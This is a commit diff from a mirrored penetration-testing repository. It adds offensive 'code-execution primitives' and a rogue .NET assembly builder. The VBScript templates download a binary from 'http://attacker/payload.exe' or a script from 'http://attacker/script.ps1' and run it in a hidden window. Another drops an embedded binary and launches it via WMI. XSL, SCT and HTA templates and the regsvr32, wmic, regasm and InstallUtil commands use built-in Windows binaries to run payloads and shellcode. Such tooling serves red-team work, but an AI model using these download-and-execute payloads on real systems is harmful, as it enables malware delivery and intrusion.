mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-21 10:01:38 +01:00
Added code-exec-templates and some additions to rogue-dot-net
This commit is contained in:
parent
b7c7da7b4e
commit
8b03b5ba40
@ -1,39 +1,39 @@
|
|||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
|
|
||||||
modname=security2
|
modname=security2
|
||||||
friendlyname=WAF
|
friendlyname=WAF
|
||||||
|
|
||||||
if [ $# -ne 1 ]; then
|
if [ $# -ne 1 ]; then
|
||||||
echo "Usage: ./toggleWaf <on|off|status>"
|
echo "Usage: ./toggleWaf <on|off|status>"
|
||||||
exit 1
|
exit 1
|
||||||
fi
|
fi
|
||||||
|
|
||||||
case $1 in
|
case $1 in
|
||||||
"on")
|
"on")
|
||||||
if [ $EUID -ne 0 ]; then
|
if [ $EUID -ne 0 ]; then
|
||||||
echo "[!] This function must be run as root. Use sudo."
|
echo "[!] This function must be run as root. Use sudo."
|
||||||
exit 1
|
exit 1
|
||||||
fi
|
fi
|
||||||
a2enmod $modname > /dev/null
|
a2enmod $modname > /dev/null
|
||||||
systemctl reload apache2
|
systemctl reload apache2
|
||||||
echo "[+] $friendlyname enabled."
|
echo "[+] $friendlyname enabled."
|
||||||
;;
|
;;
|
||||||
|
|
||||||
"off")
|
"off")
|
||||||
if [ $EUID -ne 0 ]; then
|
if [ $EUID -ne 0 ]; then
|
||||||
echo "[!] This function must be run as root. Use sudo."
|
echo "[!] This function must be run as root. Use sudo."
|
||||||
exit 1
|
exit 1
|
||||||
fi
|
fi
|
||||||
a2dismod $modname > /dev/null
|
a2dismod $modname > /dev/null
|
||||||
systemctl reload apache2
|
systemctl reload apache2
|
||||||
echo "[-] $friendlyname disabled."
|
echo "[-] $friendlyname disabled."
|
||||||
;;
|
;;
|
||||||
|
|
||||||
"status")
|
"status")
|
||||||
if a2query -m $modname 2> /dev/null | grep -q 'enabled' ; then
|
if a2query -m $modname 2> /dev/null | grep -q 'enabled' ; then
|
||||||
echo "[+] $friendlyname is enabled."
|
echo "[+] $friendlyname is enabled."
|
||||||
else
|
else
|
||||||
echo "[-] $friendlyname is disabled."
|
echo "[-] $friendlyname is disabled."
|
||||||
fi
|
fi
|
||||||
;;
|
;;
|
||||||
esac
|
esac
|
||||||
|
@ -1,67 +1,71 @@
|
|||||||
### A small collection of unobfuscated code-execution primitives in different languages
|
### A small collection of unobfuscated code-execution primitives in different languages
|
||||||
|
|
||||||
A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one.
|
A handy collection of small primitives/templates useulf for code-execution, downloading or otherwise offensive purposes. Whenever a quick sample of VBScript/JScript/C# code is needed - this directory should bring you one.
|
||||||
|
|
||||||
Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters:
|
Windows Script Host (WSH) subsystem can execute VBScript/JScript scritplets using two pre-installed interpreters:
|
||||||
|
|
||||||
- `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI**
|
- `cscript.exe` - to be used for command-line, dynamic script execution. **Doesn't load AMSI**
|
||||||
|
|
||||||
- `wscript.exe` - For general scripts execution. **This one loads AMSI**
|
- `wscript.exe` - For general scripts execution. **This one loads AMSI**
|
||||||
|
|
||||||
|
|
||||||
---
|
---
|
||||||
|
|
||||||
#### VBScript
|
#### VBScript
|
||||||
|
|
||||||
- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
|
- **`download-file-and-exec.vbs`** - Downloads a binary file using `Msxml2.ServerXMLHTTP`, stores it to the disk `Adodb.Stream` and then launches it via `Wscript.Shell Run`
|
||||||
|
|
||||||
- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
|
- **`download-powershell-and-exec-via-stdin`** - Downloads a Powershell script/commands from a given URL and passes them to _Powershell_'s `StdIn`
|
||||||
|
|
||||||
- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.
|
- **`drop-binary-file-and-launch.vbs`** - Drops embedded base64 encoded binary file to disk and then launches it.
|
||||||
|
|
||||||
- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell`
|
- **`wmi-exec-command.vbs`** - Example of VBScript code execution via WMI class' `Win32_Process` static method `Create`
|
||||||
|
|
||||||
|
- **`wscript-shell-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window.
|
||||||
---
|
|
||||||
|
- **`wscript-shell-stdin-code-exec.vbs`** - Code execution via `WScript.Shell` in a hidden window through a command passed from StdIn to `powershell`
|
||||||
#### JScript
|
|
||||||
|
|
||||||
|
---
|
||||||
---
|
|
||||||
|
#### JScript
|
||||||
#### XSL
|
|
||||||
|
|
||||||
XSL files can be executed in the following ways:
|
---
|
||||||
|
|
||||||
- Using `wmic.exe`:
|
#### XSL
|
||||||
```
|
|
||||||
wmic os get /format:"jscript-xslt-template.xsl"
|
XSL files can be executed in the following ways:
|
||||||
```
|
|
||||||
|
- Using `wmic.exe`:
|
||||||
Templates:
|
```
|
||||||
|
wmic os get /format:"jscript-xslt-template.xsl"
|
||||||
- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box.
|
```
|
||||||
|
|
||||||
- **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method
|
Templates:
|
||||||
|
|
||||||
|
- **`hello-world-jscript-xslt.xsl`** - A sample backbone for XSLT file with JScript code showing a simple message box.
|
||||||
|
|
||||||
---
|
- **`wscript-shell-run-jscript-xslt.xsl`** - JScript XSLT with `WScript.Shell.Run` method
|
||||||
|
|
||||||
#### COM Scriptlets
|
|
||||||
|
|
||||||
Sample code execution with `regsvr32` can be following:
|
---
|
||||||
```
|
|
||||||
regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll
|
#### COM Scriptlets
|
||||||
```
|
|
||||||
|
Sample code execution with `regsvr32` can be following:
|
||||||
- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run`
|
```
|
||||||
|
regsvr32 /u /n /s /i:wscript-shell-run-jscript-scriptlet.sct scrobj.dll
|
||||||
|
```
|
||||||
---
|
|
||||||
|
- **`wscript-shell-run-jscript-scriptlet.sct`** - SCT file with JSCript code execution via `WScript.Shell.Run`
|
||||||
#### HTA
|
|
||||||
|
|
||||||
HTA files are HTML Applications
|
---
|
||||||
|
|
||||||
|
#### HTA
|
||||||
|
|
||||||
|
HTA files are HTML Applications
|
||||||
|
|
||||||
- **`wscript-shell-run-vbscript.hta`** - A backbone for `WScript.Shell.Run` via _VBScript_
|
- **`wscript-shell-run-vbscript.hta`** - A backbone for `WScript.Shell.Run` via _VBScript_
|
@ -1,38 +1,36 @@
|
|||||||
'
|
'
|
||||||
' Example of downloading a binary file from the URL, saving it to the
|
' Example of downloading a binary file from the URL, saving it to the
|
||||||
' local filesystem and then launching.
|
' local filesystem and then launching.
|
||||||
'
|
'
|
||||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
' (https://github.com/mgeeky)
|
' (https://github.com/mgeeky)
|
||||||
'
|
'
|
||||||
|
|
||||||
downloadURL = "http://attacker/payload.exe"
|
downloadURL = "http://attacker/payload.exe"
|
||||||
saveAs = "%TEMP%\foo.exe"
|
saveAs = "%TEMP%\foo.exe"
|
||||||
parameters = ""
|
parameters = ""
|
||||||
|
|
||||||
Dim sh: Set sh = CreateObject("WScript.Shell")
|
Dim sh: Set sh = CreateObject("WScript.Shell")
|
||||||
out = sh.ExpandEnvironmentStrings(saveAs)
|
out = sh.ExpandEnvironmentStrings(saveAs)
|
||||||
|
|
||||||
' STEP 1: Download File
|
' STEP 1: Download File
|
||||||
Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP")
|
Dim xhr: Set xhr = CreateObject("Msxml2.ServerXMLHTTP")
|
||||||
xhr.Open "GET", downloadURL, False
|
xhr.Open "GET", downloadURL, False
|
||||||
xhr.Send
|
xhr.Send
|
||||||
|
|
||||||
' STEP 2: Save binary file
|
' STEP 2: Save binary file
|
||||||
If xhr.Status = 200 Then
|
If xhr.Status = 200 Then
|
||||||
With CreateObject("Adodb.Stream")
|
With CreateObject("Adodb.Stream")
|
||||||
.Open
|
.Open
|
||||||
.Type = 1
|
.Type = 1
|
||||||
.write xhr.responseBody
|
.write xhr.responseBody
|
||||||
.savetofile out, 2
|
.savetofile out, 2
|
||||||
End With
|
End With
|
||||||
|
|
||||||
' STEP 3: Execute file
|
' STEP 3: Execute file
|
||||||
cmd = out & " " & parameters
|
cmd = out & " " & parameters
|
||||||
MsgBox cmd
|
sh.Run cmd, 0, False
|
||||||
sh.Run cmd, 0, False
|
End If
|
||||||
|
|
||||||
End If
|
Set sh = Nothing
|
||||||
|
|
||||||
Set sh = Nothing
|
|
||||||
Set xhr = Nothing
|
Set xhr = Nothing
|
@ -0,0 +1,34 @@
|
|||||||
|
'
|
||||||
|
' Example of downloading a binary file from the URL, saving it to the
|
||||||
|
' local filesystem and then launching.
|
||||||
|
'
|
||||||
|
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
' (https://github.com/mgeeky)
|
||||||
|
'
|
||||||
|
|
||||||
|
scriptURL = "http://attacker/script.ps1"
|
||||||
|
launcher = "powershell -nop -w hid -Command -"
|
||||||
|
|
||||||
|
Dim xhr: Set xhr = CreateObject("MSXML2.XMLHTTP")
|
||||||
|
xhr.Open "GET", scriptURL, False
|
||||||
|
xhr.Send
|
||||||
|
|
||||||
|
Function bin2a(Binary)
|
||||||
|
Dim I,S
|
||||||
|
For I = 1 to LenB(Binary)
|
||||||
|
S = S & Chr(AscB(MidB(Binary,I,1)))
|
||||||
|
Next
|
||||||
|
bin2a = S
|
||||||
|
End Function
|
||||||
|
|
||||||
|
If xhr.Status = 200 Then
|
||||||
|
With CreateObject("WScript.Shell")
|
||||||
|
With .Exec(launcher)
|
||||||
|
.StdIn.WriteLine bin2a(xhr.responseBody)
|
||||||
|
.StdIn.WriteBlankLines 1
|
||||||
|
.Terminate
|
||||||
|
End With
|
||||||
|
End With
|
||||||
|
End If
|
||||||
|
|
||||||
|
Set xhr = Nothing
|
@ -0,0 +1,47 @@
|
|||||||
|
'
|
||||||
|
' Example of dropping an embedded, base64 encoded binary file to the disk,
|
||||||
|
' decoding it and then launching.
|
||||||
|
'
|
||||||
|
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
' (https://github.com/mgeeky)
|
||||||
|
'
|
||||||
|
|
||||||
|
saveFileAs = "%TEMP%\foo.exe"
|
||||||
|
launchParameters = ""
|
||||||
|
|
||||||
|
' =============================================================
|
||||||
|
|
||||||
|
fileBuffer = "<PASTE-HERE-YOUR-BASE64-ENCODED-BLOB>"
|
||||||
|
|
||||||
|
' =============================================================
|
||||||
|
|
||||||
|
Function Base64Decode(ByVal vCode)
|
||||||
|
Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
|
||||||
|
oNode.dataType = "bin.base64"
|
||||||
|
oNode.text = vCode
|
||||||
|
Base64Decode = oNode.nodeTypedValue
|
||||||
|
Set oNode = Nothing
|
||||||
|
End Function
|
||||||
|
|
||||||
|
Dim sh: Set sh = CreateObject("WScript.Shell")
|
||||||
|
out = sh.ExpandEnvironmentStrings(saveFileAs)
|
||||||
|
|
||||||
|
With CreateObject("Adodb.Stream")
|
||||||
|
.Open
|
||||||
|
.Type = 1
|
||||||
|
.write Base64Decode(fileBuffer)
|
||||||
|
.savetofile out, 2
|
||||||
|
End With
|
||||||
|
|
||||||
|
computer = "."
|
||||||
|
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
|
||||||
|
& computer & "\root\cimv2")
|
||||||
|
|
||||||
|
Set startup = wmi.Get("Win32_ProcessStartup")
|
||||||
|
Set conf = startup.SpawnInstance_
|
||||||
|
conf.ShowWindow = 12
|
||||||
|
|
||||||
|
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
|
||||||
|
|
||||||
|
command = out & " " & launchParameters
|
||||||
|
proc.Create command, Null, conf, intProcessID
|
@ -1,15 +1,15 @@
|
|||||||
<?xml version='1.0'?>
|
<?xml version='1.0'?>
|
||||||
<stylesheet
|
<stylesheet
|
||||||
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
|
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
|
||||||
xmlns:user="placeholder"
|
xmlns:user="placeholder"
|
||||||
version="1.0">
|
version="1.0">
|
||||||
<output method="text"/>
|
<output method="text"/>
|
||||||
<ms:script implements-prefix="user" language="JScript">
|
<ms:script implements-prefix="user" language="JScript">
|
||||||
<![CDATA[
|
<![CDATA[
|
||||||
|
|
||||||
// Hello world
|
// Hello world
|
||||||
var shell = new ActiveXObject("WScript.Shell");
|
var shell = new ActiveXObject("WScript.Shell");
|
||||||
shell.Popup("Hello world from JScript XSL!");
|
shell.Popup("Hello world from JScript XSL!");
|
||||||
|
|
||||||
]]> </ms:script>
|
]]> </ms:script>
|
||||||
</stylesheet>
|
</stylesheet>
|
@ -1,20 +1,20 @@
|
|||||||
'
|
'
|
||||||
' This script uses WMI class' Win32_Process static method Create to
|
' This script uses WMI class' Win32_Process static method Create to
|
||||||
' execute given command in a hidden window (ShowWindow = 12).
|
' execute given command in a hidden window (ShowWindow = 12).
|
||||||
'
|
'
|
||||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
' (https://github.com/mgeeky)
|
' (https://github.com/mgeeky)
|
||||||
'
|
'
|
||||||
|
|
||||||
command = "notepad.exe"
|
command = "notepad.exe"
|
||||||
computer = "."
|
computer = "."
|
||||||
|
|
||||||
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
|
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
|
||||||
& computer & "\root\cimv2")
|
& computer & "\root\cimv2")
|
||||||
|
|
||||||
Set startup = wmi.Get("Win32_ProcessStartup")
|
Set startup = wmi.Get("Win32_ProcessStartup")
|
||||||
Set conf = startup.SpawnInstance_
|
Set conf = startup.SpawnInstance_
|
||||||
conf.ShowWindow = 12
|
conf.ShowWindow = 12
|
||||||
|
|
||||||
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
|
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
|
||||||
proc.Create command, Null, conf, intProcessID
|
proc.Create command, Null, conf, intProcessID
|
@ -1,13 +1,13 @@
|
|||||||
'
|
'
|
||||||
' This script uses classic WScript.Shell Run method to
|
' This script uses classic WScript.Shell Run method to
|
||||||
' execute given command in a hidden window (second param = 0)
|
' execute given command in a hidden window (second param = 0)
|
||||||
'
|
'
|
||||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
' (https://github.com/mgeeky)
|
' (https://github.com/mgeeky)
|
||||||
'
|
'
|
||||||
|
|
||||||
command = "notepad.exe"
|
command = "notepad.exe"
|
||||||
|
|
||||||
With CreateObject("WScript.Shell")
|
With CreateObject("WScript.Shell")
|
||||||
.Run command, 0, False
|
.Run command, 0, False
|
||||||
End With
|
End With
|
||||||
|
@ -1,15 +1,15 @@
|
|||||||
<?XML version="1.0"?>
|
<?XML version="1.0"?>
|
||||||
<scriptlet>
|
<scriptlet>
|
||||||
<registration
|
<registration
|
||||||
progid="Foo"
|
progid="Foo"
|
||||||
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
|
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
|
||||||
<script language="JScript">
|
<script language="JScript">
|
||||||
<![CDATA[
|
<![CDATA[
|
||||||
|
|
||||||
var command = "notepad.exe";
|
var command = "notepad.exe";
|
||||||
var r = new ActiveXObject("WScript.Shell").Run(command);
|
var r = new ActiveXObject("WScript.Shell").Run(command);
|
||||||
|
|
||||||
]]>
|
]]>
|
||||||
</script>
|
</script>
|
||||||
</registration>
|
</registration>
|
||||||
</scriptlet>
|
</scriptlet>
|
@ -1,14 +1,14 @@
|
|||||||
<?xml version='1.0'?>
|
<?xml version='1.0'?>
|
||||||
<stylesheet
|
<stylesheet
|
||||||
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
|
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
|
||||||
xmlns:user="placeholder"
|
xmlns:user="placeholder"
|
||||||
version="1.0">
|
version="1.0">
|
||||||
<output method="text"/>
|
<output method="text"/>
|
||||||
<ms:script implements-prefix="user" language="JScript">
|
<ms:script implements-prefix="user" language="JScript">
|
||||||
<![CDATA[
|
<![CDATA[
|
||||||
|
|
||||||
var command = "notepad";
|
var command = "notepad";
|
||||||
var r = new ActiveXObject("WScript.Shell").Run(command);
|
var r = new ActiveXObject("WScript.Shell").Run(command);
|
||||||
|
|
||||||
]]> </ms:script>
|
]]> </ms:script>
|
||||||
</stylesheet>
|
</stylesheet>
|
@ -1,14 +1,14 @@
|
|||||||
<html>
|
<html>
|
||||||
<head>
|
<head>
|
||||||
<script language="VBScript">
|
<script language="VBScript">
|
||||||
Sub foo
|
Sub foo
|
||||||
command = "notepad.exe"
|
command = "notepad.exe"
|
||||||
Set objShell = CreateObject("Wscript.Shell")
|
Set objShell = CreateObject("Wscript.Shell")
|
||||||
objShell.Run command
|
objShell.Run command
|
||||||
End Sub
|
End Sub
|
||||||
foo()
|
foo()
|
||||||
</script>
|
</script>
|
||||||
</head>
|
</head>
|
||||||
<body>
|
<body>
|
||||||
</body>
|
</body>
|
||||||
</html>
|
</html>
|
@ -1,19 +1,19 @@
|
|||||||
'
|
'
|
||||||
' This script uses classic WScript.Shell Exec method to
|
' This script uses classic WScript.Shell Exec method to
|
||||||
' execute given command in a hidden window via StdIn passed to a dedicated
|
' execute given command in a hidden window via StdIn passed to a dedicated
|
||||||
' launcher command (powershell.exe in this example).
|
' launcher command (powershell.exe in this example).
|
||||||
'
|
'
|
||||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
' (https://github.com/mgeeky)
|
' (https://github.com/mgeeky)
|
||||||
'
|
'
|
||||||
|
|
||||||
command = "notepad.exe"
|
command = "notepad.exe"
|
||||||
launcher = "powershell -nop -w hid -Command -"
|
launcher = "powershell -nop -w hid -Command -"
|
||||||
|
|
||||||
With CreateObject("WScript.Shell")
|
With CreateObject("WScript.Shell")
|
||||||
With .Exec(launcher)
|
With .Exec(launcher)
|
||||||
.StdIn.WriteLine command
|
.StdIn.WriteLine command
|
||||||
.StdIn.WriteBlankLines 1
|
.StdIn.WriteBlankLines 1
|
||||||
.Terminate
|
.Terminate
|
||||||
End With
|
End With
|
||||||
End With
|
End With
|
||||||
|
@ -1,90 +1,90 @@
|
|||||||
## Rogue .NET Assembly for Regsvcs/Regasm/InstallUtil Code Execution
|
## Rogue .NET Assembly for Regsvcs/Regasm/InstallUtil Code Execution
|
||||||
|
|
||||||
Follow below described steps to properly generate your source code and then compile it into a nice rogue .NET Assembly ready to be executed by:
|
Follow below described steps to properly generate your source code and then compile it into a nice rogue .NET Assembly ready to be executed by:
|
||||||
|
|
||||||
- [Regasm](https://lolbas-project.github.io/lolbas/Binaries/Regasm/)
|
- [Regasm](https://lolbas-project.github.io/lolbas/Binaries/Regasm/)
|
||||||
- [Regsvcs](https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/)
|
- [Regsvcs](https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/)
|
||||||
- [InstallUtil](https://lolbas-project.github.io/lolbas/Binaries/Installutil/)
|
- [InstallUtil](https://lolbas-project.github.io/lolbas/Binaries/Installutil/)
|
||||||
|
|
||||||
### Step 1: Generate key.snk file
|
### Step 1: Generate key.snk file
|
||||||
|
|
||||||
```
|
```
|
||||||
powershell -file build.ps1
|
powershell -file build.ps1
|
||||||
```
|
```
|
||||||
|
|
||||||
### Step 2: Generate source code file
|
### Step 2: Generate source code file
|
||||||
|
|
||||||
Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation.
|
Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation.
|
||||||
|
|
||||||
Usage:
|
Usage:
|
||||||
|
|
||||||
```
|
```
|
||||||
python3 generateRogueDotNet.py --help
|
python3 generateRogueDotNet.py --help
|
||||||
|
|
||||||
:: Rogue .NET Source Code Generation Utility
|
:: Rogue .NET Source Code Generation Utility
|
||||||
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
usage: .\generateRogueDotNet.py [options] <inputFile>
|
usage: .\generateRogueDotNet.py [options] <inputFile>
|
||||||
|
|
||||||
positional arguments:
|
positional arguments:
|
||||||
inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.
|
inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.
|
||||||
|
|
||||||
optional arguments:
|
optional arguments:
|
||||||
-h, --help show this help message and exit
|
-h, --help show this help message and exit
|
||||||
-e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!
|
-e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!
|
||||||
-r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread.
|
-r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread.
|
||||||
```
|
```
|
||||||
|
|
||||||
Sample use case:
|
Sample use case:
|
||||||
|
|
||||||
```
|
```
|
||||||
python3 generateRogueDotNet.py -r notepad64.bin > program.cs
|
python3 generateRogueDotNet.py -r notepad64.bin > program.cs
|
||||||
|
|
||||||
:: Rogue .NET Source Code Generation Utility
|
:: Rogue .NET Source Code Generation Utility
|
||||||
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
[?] File specified as raw Shellcode.
|
[?] File specified as raw Shellcode.
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### Step 3: Compilate library .NET Assembly
|
### Step 3: Compilate library .NET Assembly
|
||||||
|
|
||||||
```
|
```
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
```
|
```
|
||||||
|
|
||||||
If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be:
|
If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be:
|
||||||
|
|
||||||
```
|
```
|
||||||
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
### Step 4: Code execution via Regsvcs, Regasm or InstallUtil:
|
### Step 4: Code execution via Regsvcs, Regasm or InstallUtil:
|
||||||
|
|
||||||
- x86:
|
- x86:
|
||||||
```
|
```
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll
|
||||||
|
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll
|
||||||
|
|
||||||
%WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
%WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
```
|
```
|
||||||
|
|
||||||
- x64:
|
- x64:
|
||||||
```
|
```
|
||||||
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll
|
||||||
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll
|
||||||
|
|
||||||
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll
|
||||||
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll
|
||||||
|
|
||||||
%WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
%WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
```
|
```
|
@ -1,387 +1,387 @@
|
|||||||
#!/usr/bin/python3
|
#!/usr/bin/python3
|
||||||
#
|
#
|
||||||
# Red-Teaming script that constructs C# code for Regsvcs/Regasm/InstallUtil code execution technique.
|
# Red-Teaming script that constructs C# code for Regsvcs/Regasm/InstallUtil code execution technique.
|
||||||
#
|
#
|
||||||
# Step 1: Generate source code file
|
# Step 1: Generate source code file
|
||||||
# cmd> python3 generateRogueDotNet.py -r payload.bin > program.cs
|
# cmd> python3 generateRogueDotNet.py -r payload.bin > program.cs
|
||||||
#
|
#
|
||||||
# Step 2: Compilate library .NET Assembly
|
# Step 2: Compilate library .NET Assembly
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
#
|
#
|
||||||
# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used
|
# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used
|
||||||
# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script).
|
# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script).
|
||||||
# Then proper compilation command will be:
|
# Then proper compilation command will be:
|
||||||
#
|
#
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
#
|
#
|
||||||
# Step 3: Code execution via Regsvcs, Regasm or InstallUtil:
|
# Step 3: Code execution via Regsvcs, Regasm or InstallUtil:
|
||||||
# x86:
|
# x86:
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll
|
